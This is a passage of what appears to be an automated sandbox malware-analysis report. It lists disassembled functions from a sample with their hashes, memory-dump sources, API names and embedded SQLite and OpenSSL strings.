                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA416021A0C68791EA11FB60E414AE9A335FB54344FF00132EA5D87696FF3CEA19C762
                                                                                                                                                                                                                                        Function 00007FF8A87EE270 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 412fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 977 7ff8a87ee270-7ff8a87ee2b9 978 7ff8a87ee2be-7ff8a87ee332 977->978 979 7ff8a87ee334-7ff8a87ee343 call 7ff8a87edcb0 978->979 980 7ff8a87ee35c-7ff8a87ee36c call 7ff8a87eb300 978->980 985 7ff8a87ee8d9-7ff8a87ee8fc call 7ff8a8905030 979->985 986 7ff8a87ee349-7ff8a87ee354 979->986 987 7ff8a87ee874-7ff8a87ee877 980->987 988 7ff8a87ee372-7ff8a87ee39b 980->988 986->980 990 7ff8a87ee8d4 987->990 991 7ff8a87ee879-7ff8a87ee880 987->991 992 7ff8a87ee3a0-7ff8a87ee3b5 988->992 990->985 994 7ff8a87ee882-7ff8a87ee88c 991->994 995 7ff8a87ee8cb 991->995 999 7ff8a87ee3b7-7ff8a87ee3c3 992->999 1000 7ff8a87ee3f2-7ff8a87ee3fc 992->1000 997 7ff8a87ee894-7ff8a87ee8c1 994->997 998 7ff8a87ee88e 994->998 995->990 997->990 1016 7ff8a87ee8c3-7ff8a87ee8c9 997->1016 998->997 1002 7ff8a87ee406-7ff8a87ee423 999->1002 1009 7ff8a87ee3c5-7ff8a87ee3cb 999->1009 1000->1002 1003 7ff8a87ee3fe-7ff8a87ee400 1000->1003 1006 7ff8a87ee425-7ff8a87ee429 1002->1006 1007 7ff8a87ee42b-7ff8a87ee434 1002->1007 1003->1002 1005 7ff8a87ee645-7ff8a87ee64c 1003->1005 1011 7ff8a87ee697 1005->1011 1012 7ff8a87ee64e-7ff8a87ee658 1005->1012 1008 7ff8a87ee437-7ff8a87ee449 call 7ff8a889e210 1006->1008 1007->1008 1024 7ff8a87ee466 1008->1024 1025 7ff8a87ee44b-7ff8a87ee464 call 7ff8a8858920 1008->1025 1014 7ff8a87ee3d3-7ff8a87ee3d6 1009->1014 1015 7ff8a87ee3cd-7ff8a87ee3d1 1009->1015 1022 7ff8a87ee6a0 1011->1022 1017 7ff8a87ee660-7ff8a87ee68d 1012->1017 1018 7ff8a87ee65a 1012->1018 1020 7ff8a87ee3df-7ff8a87ee3f0 1014->1020 1021 7ff8a87ee3d8-7ff8a87ee3dd 1014->1021 1015->1014 1015->1020 1016->990 1026 7ff8a87ee6a7-7ff8a87ee6aa 1017->1026 1038 7ff8a87ee68f-7ff8a87ee695 1017->1038 1018->1017 1020->992 1021->1002 1021->1020 1022->1026 1029 7ff8a87ee468-7ff8a87ee48a 1024->1029 1025->1029 1030 7ff8a87ee6ac-7ff8a87ee6b3 1026->1030 1031 7ff8a87ee708-7ff8a87ee70d 1026->1031 1035 7ff8a87ee490-7ff8a87ee4b7 CreateFileW 1029->1035 1036 7ff8a87ee6b5-7ff8a87ee6b8 1030->1036 1037 7ff8a87ee6ff 1030->1037 1031->985 1039 7ff8a87ee560 1035->1039 1040 7ff8a87ee4bd-7ff8a87ee4bf 1035->1040 1041 7ff8a87ee6c0-7ff8a87ee6ed 1036->1041 1042 7ff8a87ee6ba 1036->1042 1037->1031 1038->1022 1043 7ff8a87ee564-7ff8a87ee567 1039->1043 1044 7ff8a87ee4c1-7ff8a87ee4d3 1040->1044 1045 7ff8a87ee50f-7ff8a87ee51c 1040->1045 1041->1031 1067 7ff8a87ee6ef-7ff8a87ee6fa 1041->1067 1042->1041 1047 7ff8a87ee597-7ff8a87ee59b 1043->1047 1048 7ff8a87ee569-7ff8a87ee592 call 7ff8a87e8450 1043->1048 1050 7ff8a87ee4d7-7ff8a87ee4fd call 7ff8a87eeac0 1044->1050 1051 7ff8a87ee4d5 1044->1051 1060 7ff8a87ee51e-7ff8a87ee524 1045->1060 1061 7ff8a87ee55c-7ff8a87ee55e 1045->1061 1053 7ff8a87ee5a1-7ff8a87ee5b1 call 7ff8a87e5350 1047->1053 1054 7ff8a87ee74c-7ff8a87ee75a 1047->1054 1048->1047 1064 7ff8a87ee501-7ff8a87ee503 1050->1064 1065 7ff8a87ee4ff 1050->1065 1051->1050 1074 7ff8a87ee5b3-7ff8a87ee5ba 1053->1074 1075 7ff8a87ee60e-7ff8a87ee613 1053->1075 1062 7ff8a87ee75c-7ff8a87ee768 1054->1062 1063 7ff8a87ee76a-7ff8a87ee783 call 7ff8a87e5350 1054->1063 1069 7ff8a87ee536-7ff8a87ee539 1060->1069 1070 7ff8a87ee526-7ff8a87ee534 1060->1070 1061->1043 1062->1063 1078 7ff8a87ee785-7ff8a87ee78c 1063->1078 1079 7ff8a87ee7e0-7ff8a87ee7e3 1063->1079 1072 7ff8a87ee505-7ff8a87ee509 1064->1072 1073 7ff8a87ee50b 1064->1073 1065->1064 1067->985 1076 7ff8a87ee542-7ff8a87ee557 1069->1076 1077 7ff8a87ee53b-7ff8a87ee540 1069->1077 1070->1069 1070->1076 1072->1039 1072->1073 1073->1045 1083 7ff8a87ee605 1074->1083 1084 7ff8a87ee5bc-7ff8a87ee5c6 1074->1084 1081 7ff8a87ee712-7ff8a87ee747 call 7ff8a87ebac0 call 7ff8a889d330 1075->1081 1082 7ff8a87ee619-7ff8a87ee61e 1075->1082 1076->1035 1077->1061 1077->1076 1087 7ff8a87ee7d7 1078->1087 1088 7ff8a87ee78e-7ff8a87ee798 1078->1088 1085 7ff8a87ee7e5-7ff8a87ee7e8 1079->1085 1086 7ff8a87ee7ea 1079->1086 1081->985 1082->1081 1089 7ff8a87ee624-7ff8a87ee640 1082->1089 1083->1075 1091 7ff8a87ee5ce-7ff8a87ee5fb 1084->1091 1092 7ff8a87ee5c8 1084->1092 1094 7ff8a87ee7f1-7ff8a87ee806 1085->1094 1086->1094 1087->1079 1095 7ff8a87ee7a0-7ff8a87ee7cd 1088->1095 1096 7ff8a87ee79a 1088->1096 1089->978 1091->1075 1108 7ff8a87ee5fd-7ff8a87ee603 1091->1108 1092->1091 1098 7ff8a87ee80c-7ff8a87ee814 1094->1098 1099 7ff8a87ee808 1094->1099 1095->1079 1113 7ff8a87ee7cf-7ff8a87ee7d5 1095->1113 1096->1095 1102 7ff8a87ee816-7ff8a87ee82a call 7ff8a889e210 1098->1102 1103 7ff8a87ee84c-7ff8a87ee872 1098->1103 1099->1098 1111 7ff8a87ee82c-7ff8a87ee846 call 7ff8a8858920 1102->1111 1112 7ff8a87ee848 1102->1112 1103->985 1108->1075 1111->1103 1111->1112 1112->1103 1113->1079
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007$CreateFile
                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                        • API String ID: 4190464644-3829269058
                                                                                                                                                                                                                                        • Opcode ID: 5280a881b324a4cb6ad05f88a7fce929787e0ce99ba0f6e5e46ce8e41aa4a42d
                                                                                                                                                                                                                                        • Instruction ID: dcfe00dc376ae349572c3bc5eec81d3737cf26d208ef491c454cd3ec0870a0cf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5280a881b324a4cb6ad05f88a7fce929787e0ce99ba0f6e5e46ce8e41aa4a42d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B902D622A0F642A7FB549F21E84827977A0FF94BC5F490639DD4E136A0EF3CE4448728
                                                                                                                                                                                                                                        Function 00007FF8A87F7450 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 514COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                        • API String ID: 3568877910-4201244970
                                                                                                                                                                                                                                        • Opcode ID: e194d45f35b2fbaba2ac2ccadb7d2706a34cf4a89d42d3abf1769ea237e5720f
                                                                                                                                                                                                                                        • Instruction ID: 8bd5fc71df3852a3bf37ba35e9f7d6c9aab19990f2c44ed9da8eab99499cf8c9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e194d45f35b2fbaba2ac2ccadb7d2706a34cf4a89d42d3abf1769ea237e5720f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D32EF22A0A786A6EB648F26944437937A1FF04BE4F084238CE5E17794DF7DE851C328
                                                                                                                                                                                                                                        Function 00007FF8A87F8270 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$a29f9949895322123f7c38fbe94c649a9d6e6c9cd0c3b41c96d694552f26b309$database corruption
                                                                                                                                                                                                                                        • API String ID: 0-481979681
                                                                                                                                                                                                                                        • Opcode ID: 47c23143dffde3d282e8a81709d030b6d57d1bc04be7c078c1f514af51d55724
                                                                                                                                                                                                                                        • Instruction ID: 1100798ef2e9170d13cc5547435e9d09c3e151a7002584ff9f5a32605aee472d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47c23143dffde3d282e8a81709d030b6d57d1bc04be7c078c1f514af51d55724
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3715162A4A64AA2EB658F12E44437D67A1FF44BC4F184035CE4E077A5DFBCEC61C328
                                                                                                                                                                                                                                        Function 00007FF8A87EBC90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007FileRead
                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                        • API String ID: 3505667475-1843600136
                                                                                                                                                                                                                                        • Opcode ID: 34abadc55ce37152a0e625104273f76c47d9f65e3254af17bbb92011d13a92b2
                                                                                                                                                                                                                                        • Instruction ID: 3fecb15ef5fb93165b61af1979a6bc9764450553bc736b3996f5de8266dbf8ec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34abadc55ce37152a0e625104273f76c47d9f65e3254af17bbb92011d13a92b2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79412732A0EA02A3E711DF25E8485B97B65FF447C0F484136EA8D637A4EF3CE4468758
                                                                                                                                                                                                                                        Function 00007FF78DA65698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                        • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                        • Instruction ID: 38bb47b91681e90e3759e5caa50946c98ba77ec29ab84b318196f2ebe460bc12
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D41A362D1C781C3E314ABA1A514779A260FF94754F709334EA9C03AD1EF6DE8E8C721
                                                                                                                                                                                                                                        Function 00007FF8A87EEAC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF8A87EB300: 00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87EB363
                                                                                                                                                                                                                                        • GetFileAttributesExW.KERNEL32(?,00000000,00000000,00000000,00007FF8A87ED169), ref: 00007FF8A87EEB4A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007AttributesFile
                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                                        • API String ID: 1825365578-1873940834
                                                                                                                                                                                                                                        • Opcode ID: 84499ab29627b5492aba6b60c0e16a93cc33538438b499d00d1ba5cc5d11729b
                                                                                                                                                                                                                                        • Instruction ID: c76fa17cbdfd20ff3fd5b74cb62dcf2cf920106c8c4e9431a2ece7bff8ba991d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84499ab29627b5492aba6b60c0e16a93cc33538438b499d00d1ba5cc5d11729b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E51D532E4E743A3F724AB24A84463973A0FF947D5F890635D90E136A0EF3CE4818729
                                                                                                                                                                                                                                        Function 00007FF78DA5CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                        • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                        • Instruction ID: 8b5a625c377fdb515b2202e9c594f6b6adbb8d029a8a1063439ad87e4e09b1ce
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C313812E0D24291EA54BBA5A451BB9A7A1BF41784FF40434D94ED72DBFE2CAC4CC223
                                                                                                                                                                                                                                        Function 00007FF8A92E1497 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                                                                                                                                                                                                        • API String ID: 1452528299-2209325370
                                                                                                                                                                                                                                        • Opcode ID: 51a62517a53e1af6290c80bd97affe434bfd3fd63be3d5eac8527a8d53d04963
                                                                                                                                                                                                                                        • Instruction ID: 49356a6c12edefd0f5cff96c68af548e29aadc20b5c8acab55fc765371490b62
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51a62517a53e1af6290c80bd97affe434bfd3fd63be3d5eac8527a8d53d04963
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7815D32A0EAC595FB518E29D5843B96AE0FB44FC8F184135DE6C8BA89EF39D446C340
                                                                                                                                                                                                                                        Function 00007FF78DA601AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                        • Instruction ID: 89a0d66e74d23778988640b6be1af4073295565d8ca227545b3d57bf77b45270
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA51F721A0D641C6E734AEB5A440E7AA291BF44FA4FB44630DE6D037C5EF3CDC89C626
                                                                                                                                                                                                                                        Function 00007FF78DA6C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                        • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction ID: 49b95c72ff14f870fe2760da0d9a5e477aba02d8da39df5412afdba00879666b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1611E26170CA4181DA10BB65B804569A761BB45BF0FB40331EE7D4B7D8EF3CD809C702
                                                                                                                                                                                                                                        Function 00007FF78DA6A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
